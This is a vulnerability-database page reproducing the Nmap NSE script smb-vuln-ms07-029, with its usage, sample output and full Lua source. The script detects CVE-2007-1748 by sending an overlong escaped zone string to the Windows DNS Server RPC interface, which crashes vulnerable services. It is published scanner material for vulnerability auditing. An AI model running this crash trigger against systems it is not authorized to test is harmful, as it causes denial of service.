Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nmapRon Bowes, Jiayi Ye, Paulino Calderon <calderon()websec.mx>NMAP:SMB-VULN-MS07-029.NSE
HistoryOct 03, 2015 - 6:07 a.m.

smb-vuln-ms07-029 NSE Script

2015-10-0306:07:49
Ron Bowes, Jiayi Ye, Paulino Calderon <calderon()websec.mx>
nmap.org
86

0.973 High

EPSS

Percentile

99.9%

JSON

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.

MS07-029 targets the R_DnssrvQuery() and R_DnssrvQuery2() RPC method which isa part of DNS Server RPC interface that serves as a RPC service for configuring and getting information from the DNS Server service. DNS Server RPC service can be accessed using “\dnsserver” SMB named pipe. The vulnerability is triggered when a long string is send as the “zone” parameter which causes the buffer overflow which crashes the service.

This check was previously part of smb-check-vulns.

Script Arguments

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

randomseed, smbbasic, smbport, smbsign

See the documentation for the smb library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script smb-vuln-ms07-029.nse -p445 &lt;host&gt;
nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 &lt;host&gt;

Script Output

Host script results:
| smb-vuln-ms07-029:
|   VULNERABLE:
|   Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2007-1748
|           A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
|           Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
|           execute arbitrary code via a long zone name containing character constants represented by escape sequences.
|
|     Disclosure date: 2007-06-06
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
|_      https://technet.microsoft.com/en-us/library/security/ms07-029.aspx

Requires

local msrpc = require "msrpc"
local smb = require "smb"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.

MS07-029 targets the <code>R_DnssrvQuery()</code> and <code>R_DnssrvQuery2()</code>
RPC method which isa part of DNS Server RPC interface that serves as a RPC service
for configuring and getting information from the DNS Server service.
DNS Server RPC service can be accessed using "\dnsserver" SMB named pipe.
The vulnerability is triggered when a long string is send as the "zone" parameter
which causes the buffer overflow which crashes the service.

This check was previously part of smb-check-vulns.
]]
---
--@usage
-- nmap --script smb-vuln-ms07-029.nse -p445 <host>
-- nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 <host>
--
--@output
--Host script results:
--| smb-vuln-ms07-029:
--|   VULNERABLE:
--|   Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)
--|     State: VULNERABLE
--|     IDs:  CVE:CVE-2007-1748
--|           A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
--|           Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
--|           execute arbitrary code via a long zone name containing character constants represented by escape sequences.
--|
--|     Disclosure date: 2007-06-06
--|     References:
--|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
--|_      https://technet.microsoft.com/en-us/library/security/ms07-029.aspx
---

author = {"Ron Bowes", "Jiayi Ye", "Paulino Calderon <calderon()websec.mx>"}
copyright = "Ron Bowes"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive","exploit","dos","vuln"}
-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
-- other scans have had a chance to run)
dependencies = {
  "smb-brute", "smb-enum-sessions", "smb-security-mode",
  "smb-enum-shares", "smb-server-stats",
  "smb-enum-domains", "smb-enum-users", "smb-system-info",
  "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
  "smb-psexec",
};


hostrule = function(host)
  return smb.get_port(host) ~= nil
end

local VULNERABLE = 1
local PATCHED    = 2
local UNKNOWN    = 3
local NOTUP      = 8

---Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
--This check is not safe as it crashes the Dns Server RPC service its dependencies.
--@param host Host object.
--@return (status, result)
--* <code>status == false</code> -> <code>result == NOTUP</code> which designates
--that the targeted Dns Server RPC service is not active.
--* <code>status == true</code> ->
-- ** <code>result == VULNERABLE</code> for vulnerable.
-- ** <code>result == PATCHED</code> for not vulnerable.

function check_ms07_029(host)
  --create the SMB session
  local status, smbstate
  status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
  if(status == false) then
    stdnse.debug1("check_ms07_029: Service is not active.")
    return false, NOTUP --if not accessible across pipe then the service is inactive
  end
  --bind to DNSSERVER service
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
  if(status == false) then
    stdnse.debug1("check_ms07_029: false")
    msrpc.stop_smb(smbstate)
    return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
  end
  --call
  local req_blob, q_result
  status, q_result = msrpc.DNSSERVER_Query(
  smbstate,
  "VULNSRV",
  string.rep("\\\13", 1000),
  1)--any op num will do
  --sanity check
  msrpc.stop_smb(smbstate)
  if(status == false) then
    stdnse.debug1("check_ms07_029: DNSSERVER_Query failed")
    if(q_result == "NT_STATUS_PIPE_BROKEN") then
      return true, VULNERABLE
    else
      return true, PATCHED
    end
  else
    return true, PATCHED
  end
end

action = function(host)
  local status, result, message
  local response = {}
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host)
  local vuln_table = {
    title = 'Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)',
    state = vulns.STATE.NOT_VULN,
    description = [[
    A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
    Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
    execute arbitrary code via a long zone name containing character constants represented by escape sequences.
    ]],
    IDS = {CVE = 'CVE-2007-1748'},
    references = {
      'https://technet.microsoft.com/en-us/library/security/ms07-029.aspx'
    },
    dates = {
      disclosure = {year = '2007', month = '06', day = '06'},
    }
  }

  -- Check for ms07-029
  status, result = check_ms07_029(host)
  if(status == false) then
    if(result == NOTUP) then
      vuln_table.extra_info = "Service is not active."
      vuln_table.state = vulns.STATE.NOT_VULN
    else
      vuln_table.state = vulns.STATE.NOT_VULN
    end
  else
    if(result == VULNERABLE) then
      vuln_table.state = vulns.STATE.VULN
   else
      vuln_table.state = vulns.STATE.NOT_VULN
    end
  end
  return vuln_report:make_output(vuln_table)
end

Related

nmap 199
nmap
nmap
supermicro-ipmi-conf NSE Script
2014-08-18 01:55:06
http-wordpress-users NSE Script
2015-02-09 07:14:55
wsdd-discover NSE Script
2010-11-10 22:35:13

0.973 High

EPSS

Percentile

99.9%

JSON
Related for NMAP:SMB-VULN-MS07-029.NSE
nmap199